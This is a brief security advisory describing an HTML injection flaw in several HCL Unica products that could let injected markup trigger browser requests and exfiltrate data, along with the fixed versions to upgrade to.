HCL Unica Products HTML Injection Vulnerability Leading to Data Exfiltration

A vulnerability allowing HTML injection has been identified in multiple HCL Unica products, including Unica Platform, Audience Central, Segment Central, Centralised Offer Management, Contact Central, Journey, Plan, Campaign, and InteractDT. This vulnerability arises from the web applications' failure to properly validate or sanitize user input before displaying it on webpages. As a result, an attacker could inject unwanted HTML code, which, when the page is loaded in a browser, could automatically interact with external resources referenced in the HTML. This interaction could trigger unexpected requests from the user's browser, potentially leading to data exfiltration.

Impact

Exploitation of this vulnerability could allow an attacker to inject HTML that interacts with external resources, causing the user's browser to make unintended requests. This could be used to exfiltrate data to an external server.

Remediation

Users can upgrade to HCL Unica versions 12.1.11 or 25.1.1.0.1 (25.1.1_IF01) to address this vulnerability. The fix build for version 25.1.1.0.1 is available on the HCL Software Downloads site.